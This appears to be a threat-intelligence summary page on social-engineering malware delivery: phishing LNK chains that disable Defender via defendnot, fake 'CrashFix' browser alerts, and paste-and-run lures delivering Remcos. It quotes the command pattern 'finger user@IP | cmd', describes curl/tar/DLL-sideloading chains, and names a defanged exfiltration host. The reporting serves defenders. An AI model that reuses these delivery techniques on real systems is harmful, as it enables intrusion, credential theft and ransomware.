Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe social-engineering-driven malware delivery leading to remote access and follow-on payload deployment. Fortinet observed a multi-stage phishing campaign targeting users in Russia that delivers Amnesia RAT and ransomware via business-themed decoy documents and a malicious .lnk shortcut using a double extension (e.g., *.txt.lnk). The infection chain uses public cloud services for staging—GitHub for scripts and Dropbox for binary payloads—and abuses defendnot to trick Windows into believing a third-party AV is installed, effectively disabling Microsoft Defender before later-stage execution.
Separately, Huntress attributed activity to KongTuke, which uses malicious browser extensions to display fake “browser crash” security alerts (“CrashFix”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed ModeloRAT. ModeloRAT is described as heavily obfuscated, using Windows Registry persistence and RC4-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights Scarlet Goldfinch activity using paste-and-run lures and a notable technique of using the Windows finger client to pull remote content (e.g., finger user@IP | cmd), followed by curl download of an archive masquerading as a PDF and extraction via tar -xf, culminating in Remcos (and sometimes NetSupport) delivered via DLL sideloading.
Timeline
Jan 25, 2026
Rescana links Russia campaign TTPs to DupeHike and Paper Werewolf
A follow-up analysis assessed the phishing activity as sophisticated and noted overlaps in tactics, techniques, and procedures with UNG0902's Operation DupeHike and Paper Werewolf/GOFFEE. The report suggested a well-resourced actor pursuing a mix of espionage and financial objectives.
Jan 24, 2026
Microsoft issues mitigation guidance for defendnot-style abuse
In response to the observed tradecraft, Microsoft recommended enabling Tamper Protection and monitoring for suspicious use of Windows Security Center APIs. The guidance was aimed at detecting and mitigating attempts to disable Defender through fake antivirus registration.
Jan 24, 2026
Campaign deploys Amnesia RAT, ransomware, and WinLocker
Researchers reported that the same intrusion chain delivered Amnesia RAT for credential theft, surveillance, and remote control, followed by a Hakuna Matata-family ransomware variant that encrypted files and monitored the clipboard for cryptocurrency wallet swapping. The attack concluded with WinLocker to restrict user interaction on compromised systems.
Jan 24, 2026
Researchers detail defendnot abuse to disable Microsoft Defender
Analysis of the Russia-focused phishing campaign revealed the attackers used the public tool defendnot to register a fake antivirus with Windows Security Center, causing Microsoft Defender to turn off. The campaign also added Defender exclusions and tampered with policy and registry settings to reduce visibility and recovery options.
Jan 24, 2026
Fortinet reports phishing campaign hitting Russian organizations
Fortinet FortiGuard Labs reported a multi-stage phishing campaign targeting users in Russia with business-themed decoys and malicious LNK files in archives. The campaign delivered Amnesia RAT and a Hakuna Matata-derived ransomware without exploiting software vulnerabilities, instead abusing native Windows features and public services like GitHub, Dropbox, and Telegram.
Dec 1, 2025
Remcos intrusion chain uses Finger, curl, tar, and DLL sideloading
During the December 2025 activity, Red Canary observed an intrusion chain beginning with paste-and-run lures and use of the Windows Finger utility to retrieve remote commands or payloads. Follow-on stages used curl to download a PDF-disguised archive, tar to extract it, and DLL sideloading through a legitimate vulnerable executable to launch a malicious Remcos DLL.
Dec 1, 2025
Red Canary observes Remcos rise in Scarlet Goldfinch activity
In December 2025, Red Canary observed Remcos enter its top 10 payloads associated with the Scarlet Goldfinch activity cluster. The malware was seen delivered both alongside NetSupport Manager and on its own, suggesting a possible shift in tooling.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Threat Actors
Organizations
Sources
Related Stories
Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva‑25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
1 months ago
Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware
Multiple active malware campaigns are using **social engineering** and **trojanized content** to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to **Larva-25012** that distributes fake installers (notably a trojanized *Notepad++* package) via cracked-software sites; the `Setup.zip` bundle includes a legitimate `Setup.exe` plus a malicious sideloaded DLL (`TextShaping.dll`) that decrypts and installs **DPLoader** for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed **proxyware**. Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (**GitHub** and **Dropbox**) for payload hosting and weaponizes **Defendnot** (a Windows Security Center trust-model research tool) to disable **Microsoft Defender** before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver **Remcos RAT**, including fileless execution behavior and exploitation of `CVE-2017-11882` (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
1 months ago
Malware Delivery via Deceptive Lures: Malvertising, Fake Recruitment Repos, and Phishing Dropping RATs
Multiple reports detail **social-engineering-driven malware delivery** that results in **remote access trojans (RATs)** and credential theft. Infoblox described observing an affiliate push-notification ad network after exploiting misconfigured DNS delegations (“**Sitting Ducks**”/lame name server delegation) to take over abandoned threat-actor domains, allowing collection of **~57M logs** over two weeks and visibility into widespread **scams and brand impersonation** delivered via push ads. Nextron Systems separately reported recurring **malvertising** chains where “free converter” tools (e.g., document/image converters) downloaded from ads on legitimate sites function as advertised while covertly installing **persistent RATs**, with common artifacts such as Windows **Mark-of-the-Web** (`ZoneId=3`) indicating internet origin. Other activity in the set reflects different initial-access lures but the same general outcome—RAT-style access and data theft. Fortinet analyzed a **phishing** campaign using a fake Vietnam shipping document: a Word attachment leads to an RTF stage that exploits an RTF-related vulnerability, then uses **VBScript/PowerShell** to load a **fileless .NET module**, ultimately downloading and injecting a **Remcos** variant (including process hollowing) to provide full remote control. Separately, reporting on North Korea’s **“Contagious Interview”** campaign described fake recruiter outreach (e.g., via LinkedIn) that tricks developers into opening malicious code repositories; execution can be triggered via a hidden **VS Code `tasks` configuration**, server-side logic hooks, or a malicious npm dependency to steal credentials/crypto wallets and establish persistence—this is thematically similar (social engineering leading to remote access) but is a distinct operation from the malvertising/push-ad and Remcos phishing activity.
1 months ago